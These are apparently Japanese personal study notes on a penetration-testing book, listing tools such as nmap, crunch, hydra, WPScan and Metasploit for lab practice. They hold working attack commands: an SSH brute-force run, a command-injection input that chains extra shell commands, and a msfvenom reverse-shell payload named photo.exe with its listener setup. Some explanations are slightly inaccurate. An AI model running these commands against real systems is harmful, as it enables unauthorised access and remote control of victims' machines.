日々の事柄に関する雑記帳。





第2章

CISCenter for Internet Security
CSACloud Security Alliance
OWASPOpen Web Application Security Project
ZAPZed Attack Proxy

OWASP Japan
OWASP ZAP
  • webアプリケーション脆弱性診断ツール
スキャンによって故意にwebサイトやネットワークに負荷や影響を与えてしまうことで、不正アクセス行為の禁止等に関する法律書や偽計業務妨害罪などの関連法令に反する可能性がある
そもそもシステムの脆弱性は、「設計ミス」か「実装漏れ」のいずれかだ。これを最小に食い止めるには、検査依存からシフトレフトし、設計や実装に、セキュリティの視点を踏まえたテコ入れが必要だ。
  • OWASP
  • CSA
  • CIS

Web Application Exploits and Defenses
  • Googleが提供する学習用webサーバー
  • 脆弱性診断、ハッキング手法学習のために、意図的に脆弱性が設けられている。

IPAテクニカルウォッチ 「ウェブサイトにおける脆弱性検査手法(ウェブアプリケーション検査編)」
  • OWASP ZAPの使い方

第3章

SPFSender Policy Framework
SPFとは
SPF(Sender Policy Framework)は、自社のドメインに代わってメールを送信できるメールサーバーを指定するメール認証技術です。SPF は、自社のドメインをなりすましから保護し、メールを正常に配信するための対策として有効です。受信側のメールサーバーは、SPF を使用して、送信元とされるドメインが偽装されたものではなく実際の送信元であることを確認します。
確実なメール配信となりすまし防止(SPF)

第4章

WPScanWordPress Security ScannerWordPRessの脆弱性スキャナー

WPSCan
Kali Linux

第5章

metasploit

Metasploitable
  • 学習用仮想サーバー
  • 脆弱性診断、ハッキング手法学習のために、意図的に脆弱性が設けられている。

第6章

crunch辞書ファイル作成
hydraパスワード・ブルートフォース
nmapポートスキャナ

nmap -sS -A 192.168.1.19
  • 192.168.1.19をポートスキャンする。
  • スキャン範囲をTCPのみに限定する。
  • OSやサービスのバージョンに関する情報もスキャンする。

crunch 1 6 -o pwlist.txt
  • 1文字以上、6文字以下のパスワードを生成する。
  • パスワードは小文字アルファベットのみで構成する。
  • パスワードをpwlist.txtに出力する。

crunch 5 5 0123456789 -o pwlist.txt
  • 5文字以上、5文字以下のパスワードを生成する。
  • パスワードは数字のみで構成する。
  • パスワードをpwlist.txtに出力する。

crunch 5 5 -f 0123456789 -o pwlist.txt
  • 5文字以上、5文字以下のパスワードを生成する。
  • パスワードは数字のみで構成する。
  • パスワードをpwlist.txtに出力する。

crunch 5 5 -f /usr/share/crunch/charset.lst mixalpha-numeric -o pwlist.txt
  • 5文字以上、5文字以下のパスワードを生成する。
  • 文字種組み合わせリスト、charset.lstを参照する。
  • パスワードは英字数字混合で構成する。
  • パスワードをpwlist.txtに出力する。

hydra -t 4 -L usrlist.txt -P pwlist.txt 192.168.1.19 ssh
  • 192.168.1.19へブルートフォース攻撃する。
  • プロトコルはsshとする。
  • 試行回数は4回。
  • ユーザー名としてustlist.txtを参照する。
  • パスワードとしてpsdlist.txtを参照する。

第7章

ランサムウェア
  • 1980年代からの古典的手口
  • 暗号通貨との組み合わせ→身代金受け渡しの匿名性
  • 身代金要求
応じるリスク身代金を支払っても、暗号化が解除できない。
身代金が犯罪組織、テロ組織の資金源になる可能性。
応じないリスク復旧作業に伴う負荷、負担、機会損失。
tlssledSSL/TLSスキャン
tlssled 192.168.1.19 443
  • 192.168.1.19、ポート443をスキャンする。

第9、10章

SQLインジェクションSQLDBの不正操作
クロスサイト・スクリプティングJavaScript不正なJavaScript実行
コマンド・インジェクションwebサーバーの不正操作
sedStream EDiter

コマンド・インジェクションの例
google.co.jp && cp dns-lookup.php dns-lookup.php.bak && sed -e -i"s/DNS Lookup/PAISEN/" dns-lookup.php
google.co.jp本来の入力値
&&以降不正実行コマンド
  • dns-lookup.phpをdns-lookup.php.bakとしてコピーする。
  • sedでdns-lookup.phpを次のように編集する。
    • "DNS Lookup"を"PAISEN"へ置換する。

第11章

msfvenomペイロード・ジェネレータ
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=4444 -f -exe>photo.exe
  • photo.exeというペイロードを作成する。
    • ペイロードとしてreverse_tcpを指定する。
    • ペイロードが参照するアドレス、ポートをLHOST、LPORTに指定する。
    • ペイロードの形式を指定する。ここではWindows実行ファイル。

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.18
set lport 4444

第13章

クロスサイトリクエストフォージェリ
forgery偽造
CSRFCross-Site Request Forgery
XSSスクリプトはクライアント側で実行される。
CSRFスクリプトはサーバー側で実行される。
3分でわかるXSSとCSRFの違い

管理人/副管理人のみ編集できます